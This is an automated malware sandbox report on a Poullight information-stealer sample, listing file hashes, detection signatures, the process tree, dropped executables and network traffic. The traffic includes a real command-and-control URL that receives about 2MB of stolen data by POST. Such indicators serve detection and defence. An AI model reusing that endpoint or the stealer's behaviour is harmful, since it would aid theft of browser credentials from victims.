Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

edca2f8c36...09.exe

windows7_x64

10

edca2f8c36...09.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    190s
  • max time network
    184s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    08/05/2022, 06:15 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    edca2f8c36f24dc6520a168a499c477ff880a0fb679bf3e08b227afb42805309.exe

  • Size

    151KB

  • MD5

    9343386c659f66a4ddf860b64cf1fc55

  • SHA1

    9977986d2c647a9a51ec2a777d510d77f6006232

  • SHA256

    edca2f8c36f24dc6520a168a499c477ff880a0fb679bf3e08b227afb42805309

  • SHA512

    0a0a13acd2677fa5584dbc54bfe88358ffd8288002c6c23c9e3f7995d5b10c19fee588daf0df2a5030559af7c820d7a36b0f62aed6e514343769d0873256fd6b

Score
10/10
poullightspywarestealersuricatatrojan

Malware Config

Signatures

  • Poullight

    Poullight is an information stealer first seen in March 2020.

    trojanstealerpoullight
  • Poullight Stealer Payload 3 IoCs
  • suricata: ET MALWARE Likely Malware CnC Hosted on 000webhostapp - POST to gate.php

    suricata: ET MALWARE Likely Malware CnC Hosted on 000webhostapp - POST to gate.php

    suricata
  • suricata: ET MALWARE Matrix Max Stealer Exfiltration Observed

    suricata: ET MALWARE Matrix Max Stealer Exfiltration Observed

    suricata
  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

    suricata
  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

    suricata
  • suricata: ET MALWARE Win32/X-Files Stealer Activity

    suricata: ET MALWARE Win32/X-Files Stealer Activity

    suricata
  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\edca2f8c36f24dc6520a168a499c477ff880a0fb679bf3e08b227afb42805309.exe
    "C:\Users\Admin\AppData\Local\Temp\edca2f8c36f24dc6520a168a499c477ff880a0fb679bf3e08b227afb42805309.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4264
    • C:\Users\Admin\AppData\Local\Temp\Deobfusactor.exe
      "C:\Users\Admin\AppData\Local\Temp\Deobfusactor.exe"
      2⤵
      • Executes dropped EXE
      PID:3864
    • C:\Users\Admin\AppData\Local\Temp\webhost.exe
      "C:\Users\Admin\AppData\Local\Temp\webhost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5032
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 5032 -s 1832
        3⤵
        • Program crash
        PID:3964
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 444 -p 5032 -ip 5032
    1⤵
      PID:3960

    Network

    • flag-us
      DNS
      skai1234.000webhostapp.com
      webhost.exe
      Remote address:
      8.8.8.8:53
      Request
      skai1234.000webhostapp.com
      IN A
      Response
      skai1234.000webhostapp.com
      IN CNAME
      us-east-1.route-1.000webhost.awex.io
      us-east-1.route-1.000webhost.awex.io
      IN A
      145.14.144.173
    • flag-us
      DNS
      97.97.242.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      97.97.242.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      226.101.242.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.101.242.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      POST
      https://skai1234.000webhostapp.com/pog/gate.php
      webhost.exe
      Remote address:
      145.14.144.173:443
      Request
      POST /pog/gate.php HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: skai1234.000webhostapp.com
      Content-Length: 2113588
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Sun, 08 May 2022 09:12:22 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Server: awex
      X-Xss-Protection: 1; mode=block
      X-Content-Type-Options: nosniff
      X-Request-ID: b55626a6d7561b6e11d94122fc167534
    • flag-us
      DNS
      ru-uid-507352920.pp.ru
      webhost.exe
      Remote address:
      8.8.8.8:53
      Request
      ru-uid-507352920.pp.ru
      IN A
      Response
    • 67.26.205.254:80
      322 B
       7
    • 67.26.205.254:80
      322 B
       7
    • 20.42.65.88:443
      322 B
       7
    • 67.26.205.254:80
      322 B
       7
    • 67.26.205.254:80
      322 B
       7
    • 67.26.205.254:80
      322 B
       7
    • 145.14.144.173:443
      skai1234.000webhostapp.com
      webhost.exe
      260 B
       5
    • 145.14.144.173:443
      skai1234.000webhostapp.com
      tls
      webhost.exe
      372 B
       132 B
       4
      3
    • 145.14.144.173:443
      https://skai1234.000webhostapp.com/pog/gate.php
      tls, http
      webhost.exe
      2.2MB
       54.2kB
       1595
      1127

      HTTP Request

      POST https://skai1234.000webhostapp.com/pog/gate.php

      HTTP Response

      200
    • 8.8.8.8:53
      skai1234.000webhostapp.com
      dns
      webhost.exe
      72 B
       138 B
       1
      1

      DNS Request

      skai1234.000webhostapp.com

      DNS Response

      145.14.144.173

    • 8.8.8.8:53
      97.97.242.52.in-addr.arpa
      dns
      71 B
       145 B
       1
      1

      DNS Request

      97.97.242.52.in-addr.arpa

    • 8.8.8.8:53
      226.101.242.52.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      226.101.242.52.in-addr.arpa

    • 8.8.8.8:53
      ru-uid-507352920.pp.ru
      dns
      webhost.exe
      68 B
       141 B
       1
      1

      DNS Request

      ru-uid-507352920.pp.ru

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Deobfusactor.exe
      Filesize

      9KB

      MD5

      b95f17b473384cecf82f66c6a0e2e50c

      SHA1

      b232c45654c6cf7bc912c8f02cd86a31289ec2ab

      SHA256

      c38d762ec06d3fe74de40cbd46bab3989d14cfe2e83b8c63077a3602f8a7a3da

      SHA512

      29840efd18f7b3fe7702bb147e58a62193ae16f33dca206bf008dface5281a69a60a3c678b5748f2443362801b9334cb518aaba39f49f0880d5d7d525a6cf936

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Deobfusactor.exe
      Filesize

      9KB

      MD5

      b95f17b473384cecf82f66c6a0e2e50c

      SHA1

      b232c45654c6cf7bc912c8f02cd86a31289ec2ab

      SHA256

      c38d762ec06d3fe74de40cbd46bab3989d14cfe2e83b8c63077a3602f8a7a3da

      SHA512

      29840efd18f7b3fe7702bb147e58a62193ae16f33dca206bf008dface5281a69a60a3c678b5748f2443362801b9334cb518aaba39f49f0880d5d7d525a6cf936

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\webhost.exe
      Filesize

      97KB

      MD5

      4813c32e67f6a4f67b995068c3fa7445

      SHA1

      e5e4a2d10c3ea17a3c75e54cd08cad97f40526aa

      SHA256

      0dce39e05706807ad8222360c440b8ef612198fd350bced53bd8ffe69f62cad8

      SHA512

      5d3b1707115511656178a684ffd680661983fef751f9bb4973a4dcb13439c0ff71203441b392dec7c7fec4a9392e3317f40aa76d333bf272c80d6b8966c3f4e1

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\webhost.exe
      Filesize

      97KB

      MD5

      4813c32e67f6a4f67b995068c3fa7445

      SHA1

      e5e4a2d10c3ea17a3c75e54cd08cad97f40526aa

      SHA256

      0dce39e05706807ad8222360c440b8ef612198fd350bced53bd8ffe69f62cad8

      SHA512

      5d3b1707115511656178a684ffd680661983fef751f9bb4973a4dcb13439c0ff71203441b392dec7c7fec4a9392e3317f40aa76d333bf272c80d6b8966c3f4e1

      Download Submit

    • memory/3864-138-0x0000000000270000-0x0000000000278000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4264-131-0x0000000005E90000-0x0000000006434000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/4264-132-0x0000000005980000-0x0000000005A12000-memory.dmp

      Filesize

      584KB

      Download

    • memory/4264-133-0x0000000005960000-0x000000000596A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4264-130-0x0000000000F80000-0x0000000000F88000-memory.dmp

      Filesize

      32KB

      Download

    • memory/5032-141-0x000002186A870000-0x000002186A88E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/5032-142-0x00007FFB121F0000-0x00007FFB12CB1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5032-143-0x000002186C580000-0x000002186C58A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/5032-144-0x000002186EF30000-0x000002186F0F2000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/5032-145-0x000002186F630000-0x000002186FB58000-memory.dmp

      Filesize

      5.2MB

      Download

    • memory/5032-146-0x000002186DEE0000-0x000002186DEF2000-memory.dmp

      Filesize

      72KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.